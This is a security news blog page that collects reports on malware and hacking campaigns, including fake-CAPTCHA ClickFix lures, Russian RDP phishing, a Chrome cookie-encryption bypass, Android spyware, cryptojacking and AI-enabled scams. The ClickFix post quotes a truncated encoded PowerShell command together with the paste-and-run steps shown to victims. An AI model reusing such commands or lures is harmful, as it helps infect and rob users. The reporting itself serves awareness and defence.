Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Malicious Campaign. Show all posts
Online Security
CAPTCHA Lumma Stealer Malicious Campaign malware Online Security

Malware Campaign Expands Its Use of Fraudulent CAPTCHAs

 

Attackers are increasingly spreading malware using a unique method: a fake CAPTCHA as the initial infection vector. Researchers from multiple companies reported on this campaign in August and September. The attackers, who mainly targeted gamers, first transmitted the Lumma stealer to victims via websites hosting cracked games.

The recent adware research shows that this malicious CAPTCHA is spreading through a wide range of online resources unrelated to gaming, including adult sites, file-sharing services, betting platforms, anime resources, and web apps that monetise traffic. This shows that the distribution network is being expanded to reach a larger pool of victims. Furthermore, we discovered that the CAPTCHA distributes both Lumma and the Amadey Trojan. 

Malicious CAPTCHA

It's critical to comprehend how the attackers and their distribution network function in order to prevent falling for their tricks. Legitimate, non-malicious offers are also included in the ad network that pushes pages with the malicious CAPTCHA. 

It works as follows: the user is redirected to additional resources when they click anywhere on a page that uses the ad module. As is common with adware, the majority of redirects take users to websites that advertise security software, ad blockers, and similar products. Sometimes, though, the victim is directed to a page that contains the malicious CAPTCHA. 

Unlike genuine CAPTCHAs, which are intended to safeguard websites from bots, this copycat promotes illicit resources. As with the previous stage, the victim does not always come across malware. For example, the CAPTCHA on one of the sites invites the visitor to scan a QR code, which leads to a betting site. 

The Trojans are distributed using CAPTCHAs that provide instructions. By clicking the "I'm not a robot" button, you can copy the powershell line.exe -eC bQBzAGgAdABhA <...>MAIgA= to the clipboard and displays the following "verification steps": 

  • To open the Run dialogue box, use Win + R. 
  • Subsequently, paste the clipboard line into the text field using CTRL + V. 
  • Finally, press Enter to execute the code. 

Payload: Amadey trojan

Researchers have discovered that the same effort is also propagating the Amadey Trojan. Since 2018, Amadey has been the subject of multiple security reports. In short, the Trojan downloads multiple modules that steal credentials from major browsers and Virtual Network Computing (VNC) systems. 

It also detects cryptocurrency wallet addresses in the clipboard and replaces them with those owned by the attackers. One of the modules can also capture screenshots. In some cases, Amadey downloads the Remcos remote access tool to the victim's device, allowing the attackers complete control over it. 

From September 22 to October 14, 2024, over 140,000 users encountered ad scripts. According to Kaspersky's telemetry data, more than 20,000 of these 140,000 users were routed to infected sites, where some encountered a phoney update notification or a fake CAPTCHA. Users from Brazil, Spain, Italy, and Russia were the most commonly affected.
Read more »
Spear Phishing
Business Security Cyber Attacks Malicious Campaign Russian Hacker Spear Phishing

Microsoft Warns of Russian Spear-Phishing Campaign Targeting Multiple Organizations

 

Microsoft Threat Intelligence has discovered a new attack campaign by Russian hacker group Midnight Blizzard, targeted at thousands of users from over 100 organisations. The attack uses spear-phishing emails that contain RDP configuration files, allowing perpetrators to connect to and potentially compromise the targeted systems. 

The malicious campaign targeted thousands of users from higher education, defence, non-governmental organisations, and government institutions. Dozens of nations have been impacted, mainly in the United Kingdom, Europe, Australia, and Japan, consistent with previous Midnight Blizzard phishing attacks. 

In the most recent Midnight Blizzard assault campaign, victims received meticulously targeted emails including social engineering lures related to Microsoft, Amazon Web Services, and the concept of Zero Trust. 

According to Microsoft Threat Intelligence, the emails were sent using email addresses from legitimate organisations obtained by the threat actor during earlier breaches. Every email included an RDP configuration file signed with a free LetsEncrypt certificate and included multiple sensitive parameters. When the user accessed the file, an RDP connection was established with an attacker-controlled system. 

The threat actor could then use the established RDP connection to acquire information regarding the targeted device, such as files and folders, connected network drives, and peripherals such as printers, microphones, and smart cards. 

It would also allow for the collection of clipboard data, web authentication via Windows Hello, passkeys and security keys, and even point-of-sale devices. Such a link may also enable the threat actor to install malware on the targeted device or mapped network share(s). 

Outbound RDP connections were established to domains constructed to deceive the victim into thinking they were AWS domains. Amazon, which is collaborating with the Ukrainian CERT-UA to combat the threat, began grabbing affected domains immediately in order to stop operations. Meanwhile, Microsoft alerted all impacted customers who had been targeted or compromised.
Read more »
User Security
Chrome Extension Cyber Security Data Privacy Infostealer Malicious Campaign User Security

New Tool Circumvents Google Chrome's New Cookie Encryption System

 

A researcher has developed a tool that bypasses Google's new App-Bound encryption cookie-theft defences and extracts saved passwords from the Chrome browser. 

Alexander Hagenah, a cybersecurity researcher, published the tool, 'Chrome-App-Bound-Encryption-Decryption,' after noticing that others had previously identified equivalent bypasses. 

Although the tool delivers what several infostealer operations have already done with their malware, its public availability increases the risk for Chrome users who continue to store sensitive information in their browsers. 

Google launched Application-Bound (App-Bound) encryption in July (Chrome 127) as a new security feature that encrypts cookies using a Windows process with SYSTEM rights. 

The goal was to safeguard sensitive data against infostealer malware, which operates with the logged user's access, making it impossible to decrypt stolen cookies without first achieving SYSTEM privileges and potentially setting off security software alarms. 

"Because the App-Bound service is running with system privileges, attackers need to do more than just coax a user into running a malicious app," noted Google in July. "Now, the malware has to gain system privileges, or inject code into Chrome, something that legitimate software shouldn't be doing.” 

However, by September, several infostealer thieves had discovered ways to circumvent the new security feature, allowing their cybercriminal customers to once again siphon and decrypt sensitive data from Google Chrome. 

Google previously stated that the "cat and mouse" game between info-stealer developers and its engineers was to be expected, and that they never assumed that its defence measures would be impenetrable. Instead, they believed that by introducing App-Bound encryption, they could finally set the groundwork for progressively constructing a more robust system. Below is Google's response from the time:

"We are aware of the disruption that this new defense has caused to the infostealer landscape and, as we stated in the blog, we expect this protection to cause a shift in attacker behavior to more observable techniques such as injection or memory scraping. This matches the new behavior we have seen. 

We continue to work with OS and AV vendors to try and more reliably detect these new types of attacks, as well as continuing to iterate on hardening defenses to improve protection against infostealers for our users.”
Read more »
Windows User
Cyber Security Fake Captcha Malicious Campaign Threat Intelligence Windows User

Microsoft Issues New Warnings For Windows Users

 

As we approach the weekend, a new warning has been issued that a "global attack" is now targeting Windows users in multiple nations worldwide. The campaign is surprisingly basic, but it highlights the risk for the hundreds of millions of Windows 10 customers who will be without security upgrades in a year. 

Palo Alto Networks' Unit 42 warned about the risks of fake new CAPTCHAs last month. Although it didn't receive much attention at the time, researcher John Hammond's video on X helped spread the word. McAfee researchers have recently released a fresh alert regarding these fraudulent CAPTCHA popups that are currently circulating. 

These assaults should be easy to detect—but they’re designed to be casually effective. The fake challenges are designed to distribute Lumma Stealer. “These pages have a button that, when clicked, shows instructions for victims to paste PowerShell script into a Run window. This copy/paste PowerShell script retrieves and runs a Windows EXE for Lumma Stealer malware. The associated Lumma Stealer EXE files retrieve and use zip archives that don't appear to be inherently malicious on their own,” researchers explained. In its latest research, McAfee cautions that the ClickFix infection chain operates by tricking people into clicking on buttons like Verify you are a human' or 'I am not a robot.'" 

When clicked, a malicious script is copied to the user's clipboard. Users are then tricked into pasting the script after pressing the Windows key + R, unknowingly launching the malware. This technique speeds up the infection process, allowing attackers to easily deploy malware. 

The pattern is apparent to you. The crypto wallets and your account credentials are the main targets of the information-stealing malware that will be installed on your device. It doesn't appear to be a typical CAPTCHA, even if they are evolving and becoming more difficult to figure out. However, if, at that moment, copying and pasting isn't making you feel uneasy, turn off your computer and perhaps take a break. 

Furthermore, McAfee identifies two deviously created lures, one aimed at consumers ready to download illegally copied games and the other at software developers concerned about a security flaw in code they wrote and distributed. 

Users searching online for illegal copies of games are likely to have their guard up in any case; yet, the team warns that "they may encounter online forums, community posts, or public repositories that redirect them to malicious links.” 

The second target group is even more sneaky. Users get phishing emails that frequently target GitHub contributors, pushing them to fix a fake security flaw. These emails provide links to the same fraudulent CAPTCHA pages. 

This fake CAPTCHA campaign is starting to propagate; be cautious and take a moment to look for any signs of compromise when faced with one. It won't always be as clear as it is in this instance. These attacks will change and become more difficult to identify. It goes without saying that you should never, ever copy and paste and then execute from within a CAPTCHA. 

This serves as another timely reminder to Windows 10 users that discontinuing support should not be one of their actions between now and October of next year. You'll need to switch to Windows 11 if Microsoft doesn't offer reasonably priced extension alternatives and workarounds aren't sufficient to close the gap.
Read more »
UK
Cyber Attacks Malicious Campaign Telecom Firm UK

BT Uncovers 2,000 Potential Cyberattacks Signals Every Second

 

BT logs 2,000 potential cyber attack signals per second, according to the latest data from the telecom behemoth, as it warns of the rising threat from cyber criminals.

The telecom firm stated it found that web-connected devices were being scanned more than 1,000 times each a day by known malicious sources, as attackers scan for vulnerabilities in online systems. While some scans are authentic for security monitoring, BT stated that 78% were not harmless. 

BT said its most recent data on the issue revealed a 1,234% lift in new malicious scanners across its networks over the last year, and cautioned that the increase could be attributed to more malicious actors using AI-powered, automated bots to scan for vulnerabilities in security systems in order to avoid tools designed to detect suspicious activity.

The UK's National Cyber Security Centre (NCSC) has previously cautioned that AI technologies were upskilling malicious actors and lowering the entrance barrier to launch cyber attacks.

According to BT's research, the IT, defence, and financial services sectors were the most targeted for cyber assaults, but other sectors, such as retail, education, and hospitality, were being increasingly targeted since they are seen to have a lower security focus. The data was made public during BT's Secure Tomorrow cybersecurity festival at the company's Adastral Park research facility in Suffolk. 

“Today, every business is a digital business, and our data shows that every 90 seconds hackers are checking connected devices to find a way in – like opportunistic burglars looking for an open window,” Tris Morgan, managing director for security at BT, stated. 

“Tools like AI provide new routes of attack, but they can also the first line of defence. At BT, we’re constantly evolving our network security to stay one step ahead and protect more than a million businesses, day in, day out.” 

The cybersecurity warning comes after the government announced that all UK data centres will be designated as Critical National Infrastructure (CNI), putting them on an equal footing with energy, water, and emergency services infrastructure, and will now receive more government support and protection from cyber attacks, IT blackouts, and environmental disasters.
Read more »
Yemen
Android Spyware Humanitarian Aid Malicious Campaign malware Pro-Houthi Group Yemen

Pro-Houthi Group Deploys Android Spyware to Target Yemeni Humanitarian Orgs

 

Insikt Group's research reveals that OilAlpha, a suspected pro-Houthi entity, continues to target humanitarian and human rights organisations in Yemen. They deploy malicious Android applications to steal credentials and gather intelligence, with the ability to control aid distribution. 

Notable organisations affected include CARE International and the Norwegian Refugee Council. This report focuses on the continuous threat and recommends mitigating techniques such as social engineering skills, safe passwords, and multi-factor authentication. 

In May 2023, Insikt outfit published its first report on OilAlpha, a pro-Houthi outfit that targets humanitarian organisations in Yemen with malicious Android applications. A year later, new discoveries show that OilAlpha is still active and poses a serious threat to humanitarian activities in the region. 

A recently published report identified a new group of malicious mobile apps and infrastructure associated with OilAlpha. Employees of internationally renowned humanitarian organisations, such as Saudi Arabia's King Salman Humanitarian Aid and Relief Centre, the Norwegian Refugee Council, and CARE International, are the target audience for these applications. 

Last month researchers discovered a malicious Android file named “Cash Incentives.apk,” linked to OilAlpha's infrastructure. The app requests invasive permissions, including access to the camera, audio, SMS, contacts, and more, classifying it as a remote access trojan (RAT). Subsequent investigation identified two more malicious applications targeting the Norwegian Refugee Council and CARE International, all attempting to steal credentials and gather sensitive information. 

OilAlpha's operations include a credential theft portal under the domain kssnew[.]online. This webpage impersonates the login pages of humanitarian organisations, prompting users to enter their credentials, which are then captured by the perpetrators. 

To address this issue, organisations should create information security policies and perform social engineering and anti-phishing awareness training. Strong passwords and multi-factor authentication (MFA) can dramatically reduce the likelihood of credential theft. Furthermore, users should exercise caution when using direct messaging on social media and encrypted messages, and check the legitimacy of messages whenever possible. 

OilAlpha's operations point to a persistent effort to influence humanitarian relief distribution in Yemen. The group's focus on humanitarian organisations is expected to continue, possibly spreading outside Yemen.
Read more »
Ransomware
Data Healthcare Malicious Campaign malware Ransomware

Defending Hospitals and Clinics: Strategies Against Ransomware

Defending Hospitals and Clinics: Strategies Against Ransomware

The healthcare industry has become a prime target for ransomware attacks in recent years. These malicious campaigns exploit vulnerabilities in healthcare systems, disrupt critical services, and compromise sensitive patient data. 

According to Steve Stone, president of Rubrik's Zero Labs, ransomware is one of the levers changing how enterprises think about risk. Zero Labs' latest analysis shows that healthcare firms are more likely to lose 20% of their sensitive data after a ransomware attack.

This blog post will explore why healthcare organizations are at risk and discuss strategies to mitigate these threats.

1. Data Sensitivity and Volume

Healthcare organizations handle vast amounts of sensitive data, including patient records, medical histories, and financial information. This data is a goldmine for cybercriminals seeking economic gain. According to recent reports, healthcare data breaches cost organizations an average of $7.13 million per incident. The sheer volume of sensitive data makes healthcare an attractive target.

2. Architectural Similarities

While ransomware operators don’t exclusively focus on healthcare, the industry shares architectural nuances with other sectors. For instance:

Legacy Systems: Many healthcare institutions still rely on legacy systems that lack robust security features. These outdated systems are more susceptible to attacks.

Interconnected Networks: Healthcare networks connect various entities—hospitals, clinics, laboratories, and insurance providers. This interconnectedness creates multiple entry points for attackers.

Medical Devices: Internet of Things (IoT) devices, such as MRI machines and infusion pumps, are integral to patient care. However, they often lack proper security controls, making them vulnerable.

3. Risk Surface Area

Preventing ransomware starts with understanding your risk surface area. Here’s how healthcare organizations can reduce their exposure:

Identity Management: Properly managing user identities and access rights is crucial. Limiting access to sensitive data based on roles and responsibilities helps prevent unauthorized changes.

Data Visibility: Organizations must know where sensitive data resides, both on-premises and in the cloud. Regular audits and data classification are essential.

Backup and Recovery: Robust backup solutions are critical. Regularly backing up data ensures that even if ransomware strikes, organizations can restore systems without paying the ransom.

4. Incident Response Challenges

Healthcare organizations face unique challenges in incident response:

Hybrid Environments: Many healthcare systems operate in hybrid environments—partly on-premises and partly in the cloud. Coordinating incident response across these environments can be complex.

Patient Safety: Ransomware attacks can disrupt critical services, affecting patient care. Balancing data protection with patient safety is a delicate task.

Collaboration: Effective incident response requires collaboration among IT teams, legal departments, and external cybersecurity experts.

Read more »
Malicious Campaign
CISA Credential Theft Data Breach Data Leak Malicious Campaign

Hackers Reveal Their Strategy of Stealing Snowflake's Ticketmaster Data

 

Ticketmaster and other organisations' Snowflake accounts were said to have been accessed by a ShinyHunters hacker via a breach of software engineering firm EPAM Systems, validating a Mandiant report attributing some of the intrusions to third-party contractor hacks, Wired reported. 

According to the hacker, information-stealing malware and a remote access trojan deployed against one of EPAM Systems' Ukraine-based employees allowed ShinyHunters to gain access to unencrypted credentials used by the employee to access the firm's customers' Snowflake accounts, which were then used to infiltrate the Snowflake accounts, including the one owned by Ticketmaster. 

EPAM ruled out the ShinyHunters hacker's claims, but independent security researcher "Reddington" discovered an infostealer-harvested data repository online, including the internal EPAM URL to Ticketmaster's Snowflake account and the credentials employed by the EPAM worker to access Ticketmaster's account. 

"This means that anyone that knew the correct URL to [Ticketmaster’s] Snowflake could have simply looked up the password, logged in, and stolen the data" noted Reddington. 

In the hacking campaign targeting Snowflake's clients, nearly 165 customer accounts were potentially compromised, but only a few of these have been identified thus far. In addition to Ticketmaster, the banking corporation Santander has recognised that their data was stolen but has neglected to name the account from which it was taken. 

However, a local media outlet has confirmed that it was a Snowflake account; the stolen data included bank account information for 30 million customers, including 6 million account numbers and balances, 28 million credit card numbers, and human resources information about employees, according to a post published by the hackers. Lending Tree and Advance Auto Parts have also confirmed that they could possibly be victims of this campaign. 

In a notice published earlier this week, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) urged that organisations follow Snowflake's recommendations to look for signals of odd behaviour and take precautions to prevent unauthorised access. A similar advice issued by the Australian Signals Directorate's Australian Cyber Security Centre (ACSC) warned of "successful compromises of several companies using Snowflake environments.”
Read more »
malware
BitRAT Fake Browser Fake Sites Malicious Campaign malware

Fraudulent Browser Updates Are Propagating BitRAT and Lumma Stealer Malware

 

Fake web browser updates are being used to spread remote access trojans (RATs) and information stealer malware like BitRAT and Lumma Stealer (aka LummaC2). 

"Fake browser updates have been responsible for numerous malware infections, including those of the well-known SocGholish malware,"cybersecurity company eSentire stated in a recent research. "In April 2024, we observed FakeBat being distributed via similar fake update mechanisms.”

The attack chain begins when potential targets visit a fake website with JavaScript code that redirects them to a fraudulent browser update page ("chatgpt-app[.]cloud"). The redirected web page includes a download link to a ZIP archive file ("Update.zip") located on Discord that is automatically downloaded to the victim's device.

It's worth noting that threat actors frequently use Discord as an attack vector, with Bitdefender's recent study revealing more than 50,000 unsecured connections propagating malware, phishing campaigns, and spam during the past six months.

Another JavaScript file ("Update.js") is included in the ZIP archive file, and it executes PowerShell scripts responsible for downloading further payloads, such as BitRAT and Lumma Stealer, from a remote server in the form of PNG image files. 

This method also retrieves PowerShell scripts for persistence and a.NET-based loader, which is generally used to start the final-stage malware. According to eSentire, the loader is most likely represented as a "malware delivery service" because it is used to spread both BitRAT and Lumma Stealer. 

BitRAT is a feature-rich RAT that enables attackers to collect data, mine cryptocurrency, download additional malware, and remotely control infected systems. Lumma Stealer, a commodity stealer malware offered for $250 to $1,000 per month since August 2022, can take data from online browsers, cryptocurrency wallets, and other sensitive information. 

"The fake browser update lure has become common amongst attackers as a means of entry to a device or network," the company noted, adding it "displays the operator's ability to leverage trusted names to maximize reach and impact.”

While such attacks typically employ drive-by downloads and malvertising techniques, ReliaQuest reported last week that it identified a new variant of the ClearFake campaign that tricked consumers into copying, pasting, and manually executing malicious PowerShell code under the guise of a browser update. 

Specifically, the malicious website claims that "something went wrong while displaying this webpage" and instructs the site visitor to install a root certificate to resolve the issue by following a series of steps that include copying and pasting obfuscated PowerShell code into a PowerShell terminal. 

"Upon execution, the PowerShell code performs multiple functions, including clearing the DNS cache, displaying a message box, downloading further PowerShell code, and installing 'LummaC2' malware," the company added.
Read more »
Targeted Attack
Cyber Attacks EU Diplomats Malicious Campaign PDF Exploits Targeted Attack

Hackers Employ Malicious PDF Files To Kickstart Infection Chain

 

Fine wine is a cultural trait that Europeans are renowned for, but attackers behind a recent threat campaign have exploited this to their advantage. By luring European Union (EU) diplomats with a fake wine-tasting event, the cyber operation aimed to deliver a unique backdoor. 

In a blog post published on February 27, researchers at Zscaler's ThreatLabz reported that they had found the campaign, which especially targeted officials from EU nations with diplomatic posts in India. The actor, dubbed "SpikedWine," used a PDF file in emails that pretended to be an invitation letter from India's embassy, inviting diplomats to a wine-tasting event on February 2. 

"We believe that a nation-state threat actor, interested in exploiting the geopolitical relations between India and diplomats in European nations, carried out this attack," Zscaler ThreatLabz researchers Sudeep Singh and Roy Tay explained in the post.

The campaign's payload is a backdoor known as "WineLoader," which has a modular design and uses tactics designed to avoid detection. These include re-encryption and zeroing out memory buffers, which serve to safeguard sensitive data in memory while evading memory forensics tools, the researchers stated. 

SpikedWine employed compromised websites for command-and-control (C2) at different phases of the attack chain, which started with a victim clicking on a link in the PDF and ended with the modular distribution of WineLoader. Overall, the cyber attackers exhibited a high degree of expertise, both in the creative design of the socially engineered campaign and in the delivery of the malware. 

Zscaler ThreatLabz found the PDF file, which was uploaded to VirusTotal from Latvia on January 30. The attackers meticulously built the contents to imitate India's ambassador, and the invitation contains a malicious link to a false questionnaire that must be completed in order to participate. 

Clicking on the link takes users to a hacked site where they can download a zip archive containing a file named "wine.hta." The downloaded file contains obfuscated JavaScript code that triggers the next stage of the attack. 

Eventually, the file runs sqlwriter.exe from the directory C:\Windows\Tasks\ to initiate the WineLoader backdoor infection chain by loading a malicious DLL called vcruntime140.dll. This, in turn, calls an exported method set_se_translator, which decrypts the embedded WineLoader core module within the DLL using a hardcoded 256-byte RC4 key before running it. 

Protection and detection 

Zscaler ThreatLabz warned contacts at India's National Informatics Centre (NIC) about the attack's usage of Indian official themes. 

The C2 server used in the assault only replies to specific types of queries at specific times, therefore automated analysis systems cannot acquire C2 responses and modular payloads for detection and analysis, according to the researchers. To assist defenders, they offered a list of indicators of compromise (IoCs) and URLs related to the attack in their blog post. 

A multilayered cloud security platform should detect IoCs linked to WineLoader at multiple levels, including any files containing the threat name Win64.Downloader.WineLoader, the researchers concluded.
Read more »
Malicious Campaign
Cryptojacking Campaign Cyber Attacks Docker API Malicious Campaign

Novel Crytpojacking Campaign is Targeting Docker APIs Across the Internet

 

Cado security researchers recently identified a sophisticated cryptojacking campaign that exploits exposed Docker API endpoints over the internet. 

The campaign, called “Commando Cat”, has been operating since early 2024, the researchers noted, claiming that this was the second such effort to be identified in only two months. The first container, created with the Commando open-source tool, seems innocent, but it allows the criminals to escape and launch several payloads on the Docker host itself.

The payloads delivered are determined by the campaign's short-term targets, which include establishing persistence, backdooring the host, exfiltrating cloud service provider credentials, and activating cryptocurrency miners, according to the researchers. This campaign's cryptocurrency miner is the famed XMRig, a popular cryptojacker that mines Monero (XMR), a privacy-oriented currency that is nearly impossible to track. 

Cado Security's researchers added that Commando cat temporarily stores stolen files in a separate folder, implying that this is done as an evasion tactic. Indeed, this complicates forensic analysis. 

At press time, the researchers had no idea who the threat actors behind Commando Cat were, although they did detect resemblance in shell scripts and C2 IP addresses with another cryptojacking outfit dubbed TeamTNT. Cado, however, does not believe TeamTNT is behind this particular effort and instead suspects a copycat organisation. 

The researchers advised that users should upgrade their Docker instances and install necessary security measures to safeguard themselves from such attacks. 

Last month, the same cybersecurity team uncovered a similar campaign that used insecure Docker hosts to install both XMRig and the 9Hits Viewer software. 9hits is an online traffic exchange platform that allows users to drive traffic to each other.

When a user installs 9hits, their device visits the websites of other members using a headless Chrome instance. In exchange, the user earns credits, which may subsequently be used to attract traffic to their own websites. Installing 9hits on compromised Docker instances generates more credits, which the attackers can then use to buy more traffic.
Read more »
Phishing scam
AI Phishing AI Scams ChatGPT Cyber Fraud Malicious Campaign Phishing scam

Watch Out For These ChatGPT and AI Scams

 

Since ChatGPT's inception in November of last year, it has consistently shown to be helpful, with people all around the world coming up with new ways to use the technology every day. The strength of AI tools, however, means that they may also be employed for sinister purposes like creating malware programmes and phishing emails. 

Over the past six to eight months, hackers have been observed exploiting the trend to defraud individuals of their money and information by creating false investment opportunities and scam applications. They have also been observed using artificial intelligence to plan scams. 

AI scams are some of the hardest to spot, and many people don't use technologies like Surfshark antivirus, which alerts users before they visit dubious websites or download dubious apps. As a result, we have compiled a list of all the prevalent strategies that have lately been seen in the wild. 

Phishing scams with AI assistance 

Phishing scams have been around for a long time. Scammers can send you emails or texts pretending to be from a trustworthy organisation, like Microsoft, in an effort to trick you into clicking a link that will take you to a dangerous website.

A threat actor can then use that location to spread malware or steal sensitive data like passwords from your device. Spelling and grammar mistakes, which a prominent corporation like Microsoft would never make in a business email to its clients, have historically been one of the simplest ways to identify them. 

However, in 2023 ChatGPT will be able to produce clear, fluid copy that is free of typos with just a brief suggestion. This makes it far more difficult to differentiate between authentic letters and phishing attacks. 

Voice clone AI scams

In recent months, frauds utilising artificial intelligence (AI) have gained attention. 10% of respondents to a recent global McAfee study said they have already been personally targeted by an AI voice scam. 15% more people claimed to be acquainted with a victim. 

AI voice scams use text-to-speech software to create new content that mimics the original audio by stealing audio files from a target's social network account. These kinds of programmes have valid, non-nefarious functions and are accessible online for free. 

The con artist will record a voicemail or voice message in which they portray their target as distressed and in need of money desperately. In the hopes that their family members won't be able to tell the difference between their loved one's voice and an AI-generated one, this will then be transmitted to them. 

Scams with AI investments

 
Scammers are using the hype surrounding AI, as well as the technology itself, in a manner similar to how they did with cryptocurrencies, to create phoney investment possibilities that look real.

Both "TeslaCoin" and "TruthGPT Coin" have been utilised in fraud schemes, capitalising on the attention that Elon Musk and ChatGPT have received in the media and positioning themselves as hip investment prospects. 

According to California's Department of Financial Protection & Innovation, Maxpread Technologies fabricated an AI-generated CEO and programmed it with a script enticing potential investors to make investments. An order to cease and desist has been given to the corporation. 

The DFPI claims that Harvest Keeper, another investment firm, collapsed back in March. According to Forbes, Harvest Keeper employed an actor to pose as their CEO in an effort to calm irate clients. This demonstrates the lengths some con artists will go to make sure their sales spiel is plausible enough.

Way forward

Consumers in the US lost a staggering $8.8 billion to scammers in 2022, and 2023 is not expected to be any different. Periods of financial instability frequently coincide with rises in fraud, and many nations worldwide are experiencing difficulties. 

Artificial intelligence is currently a goldmine for con artists. Although everyone is talking about it, relatively few people are actually knowledgeable about it, and businesses of all sizes are rushing AI products to market. 

Keeping up with the most recent scams is crucial, and now that AI has made them much more difficult to detect, it's even more crucial. Following them on social media for the most recent information is strongly encouraged because the FTC, FBI, and other federal agencies frequently issue warnings. 

Security professionals advised buying a VPN that detects spyware, such NordVPN or Surfshark. In addition to alerting you to dubious websites hidden on Google Search results pages, they both will disguise your IP address like a conventional VPN. It's crucial to arm oneself with technology like this if you want to be safe online.
Read more »
Media Outlets
Bangladeshi hackers Cyber Attacks Fake news Indian Media Hack Malicious Campaign Media Outlets

Bangladeshi Hacker Group Targets Multiple Indian News Agencies

 

An update regarding the cyberattack on Alt News has brought up cybersecurity news in Indian media once more. After focusing on Indian news agency ANI News for a few hours, the threat actor group "Mysterious Team Bangladesh" has now listed the well-known Indian fact-checking website "Alt News" as its latest victim. 

The hacktivist group claims that the purported ANI News and Alt News cyberattacks are a part of their ongoing OpIndia23 campaign against the Indian media for allegedly inciting hatred and false information. 

ANI News is a news organisation with its main office in New Delhi. Mohammed Zubair and Pratik Sinha, two former IT engineers, launched the fact-checking website Alt News, a non-profit organisation in India. 

Both organisations' websites were reachable at the time of writing. A number of cyberattacks on international targets included the claimed Alt News hack. 

Mysterious Team shared the hashtags "opindia23," "counterattack," and "OpTerrorismCountry" along with the Telegram message. The group has accounts on several social media networks and has 1,283 Telegram subscribers. 

The bio for the gang on its Twitter account, where they frequently discuss the specifics of their attacks and victims, reads, "We are cyber warriors of Bangladesh." 

Along with articles on hacking and cyberattacks, the group also publishes the names of other hackers. A name that came up was "_barbby," who according to his biography is a journalist and a human rights advocate. There were two hashtags on the profile: OpIsrael and FreePalestine.

In the bio of another hacker, YourAnonRiots, it was said, "Our mission is global peace." The profile's hashtag was HackThePlanet, which appears to be the case in light of the hacking attacks on numerous government and other organisation websites. Your Anon Story, MCA Ops, and Saudi Exile were the other hackers that had been identified.

In the past 24 hours, the Mysterious Team Bangladesh group has also listed TV7 Israel News, Uniurdu, an Urdu-language news website, and Univarta, a Hindi-language news website, as victims. Furthermore, the hacktivist group also targeted the website of The Press Trust of India.

Along with saying "Expect Us," the organisation also declared that it had attacked the Indian Computer Emergency Response Team. 

The Mysterious Team appears to be a sizable group made up of numerous hackers that use system weaknesses to get access. But nothing is known about their method of attack other than the fact that they effectively shut down the systems and publish screenshots of their hacks on their various social media platforms.
Read more »
User Security
AI Tool Artificial Intelligence Malicious Campaign Online Crime Technology User Security

How AI is Helping Threat Actors to Launch Cyber Attacks

 

Artificial intelligence offers great promise, and while many tech enthusiasts are enthusiastic about it, hackers are also looking to this technology to aid their illicit activities. The field of artificial intelligence is interesting, but it may also make us nervous. Therefore, how might AI support online criminals? 

Social engineering 

Every week, social engineering, a form of cybercrime, claims countless victims and is a big issue worldwide. In this technique, the victim is coerced into complying with the attacker's demands through manipulation, frequently without being aware that they are the target. 

By creating the text that appears in fraudulent communications like phishing emails and SMS, AI could aid in social engineering attempts. It wouldn't be impossible, even with today's level of AI development, to instruct a chatbot to create a compelling or persuasive script, which the cybercriminal could then employ against their victims. People have taken notice of this threat and are already worried about the dangers that lie ahead.

In this way, by correcting typos and grammatical errors, AI might potentially assist in making hostile communications appear more formal and professional. Therefore, it might be advantageous for cybercriminals if they can write their social engineering content more clearly and effectively. Such errors are frequently described as potential indicators of malicious activity. 

Analysing stolen data

Data is worth as much as gold. Sensitive information is currently regularly sold on dark web markets, and some dangerous actors are willing to pay a very high price for the information if it is sufficiently valuable. 

But data must first be stolen in order for it to appear on these marketplaces. Small-scale data theft is undoubtedly possible, particularly when an attacker targets single victims. However, larger hacks may lead to the theft of sizable databases. The cybercriminal must now decide whatever information in this database is worthwhile. 

A malicious actor would spend less time deciding what is worthwhile to sell or, on the other hand, directly exploit by hand if the process of identifying valuable information were to be expedited with AI. Since learning is the foundation of artificial intelligence, it might someday be simple to use an AI-powered tool to detect sensitive information that is valuable. 

Malware writing 

Some people would not be surprised to learn that malware can be created using artificial intelligence because this is a sophisticated form of technology. A combination of the words "malicious" and "software," malware refers to the various types of malicious software used in hacking. 

Malware must first be written, though, in order to be used. Cybercriminals aren't all skilled programmers; others just don't want to spend the time learning how to write new programmes. AI may prove useful in this situation. 

It was discovered that ChatGPT might be used to create malware for nefarious activities in the early 2023. An AI infrastructure supports OpenAI's wildly popular ChatGPT. Despite the fact that this chatbot is being used by hackers, it can perform many important tasks. 

In one particular instance, a user claimed in a forum for hackers that ChatGPT had been used to write a Python-based malware programme. Writing malicious software could be efficiently automated with ChatGPT. This makes it easier for novice cybercriminals with limited technical knowledge to operate. 

Instead of writing sophisticated code that poses serious hazards, ChatGPT (or at least its most recent version) is only capable of producing simple, occasionally problematic malware programmes. This does not preclude the employment of AI to create malicious software, either. Given that a modern AI chatbot is already capable of writing simple malicious programmes, it might not be long before we start to notice more heinous malware coming from AI systems. 

Bottom line 

Artificial intelligence has been and will continue to be abused by cybercriminals, as is the case with the majority of technological advancements. It's absolutely impossible to predict how hackers will be able to progress their attacks utilising this technology in the near future given that AI already has certain dubious skills. Cybersecurity companies may also use AI more frequently to combat similar threats, but only time will tell how this one develops.
Read more »
United States
Cyber Security Malicious Campaign National Security Swatting Calls Swatting Service United States

Digitally Crafted Swatting Service Is Wreaking Havoc Across United States

 

A Telegram user who claimed to have left bombs in places like high schools by using a digitally synthesised voice has been linked to a series of swatting calls that have occurred over several months across the United States. 

According to Vice, the user going by the alias "Torswats" on the messaging app Telegram provides a paid service to make swatting calls. Swatting is the act of lying to law authorities about a bomb threat or falsely accusing another person in a specific location of committing a crime or storing illegal materials. 

Customers may purchase "extreme swattings" for $50, which typically involve cops handcuffing a suspect and searching their home, and for $75, Torswats can reportedly lock down a school. In accordance with a story from Vice, Torswats would take bitcoin as payment, give loyal clients a discount, and will haggle over prices for well-known targets.

“Hello, I just committed a crime and I want to confess. I placed explosives in a local school,” says the voice on a tape of a Torswats call with law police. 

Torswats' voice is artificial intelligence generated digitally, however, it's not immediately clear whether this is the same technology that has made some voice performers obsolete by so expertly simulating human vocalisations. Vice found two recordings out of 35 that didn't employ a digital voice. Torswats threatened to detonate a bomb at Hempstead High School in Dubuque, Iowa, according to a phone call tape obtained by Vice. Local media reported on the threat. 

Torswats allegedly also targeted a CBD store in Florida, a business in Maryland, and homes in Virginia, Massachusetts, Texas, and California. 

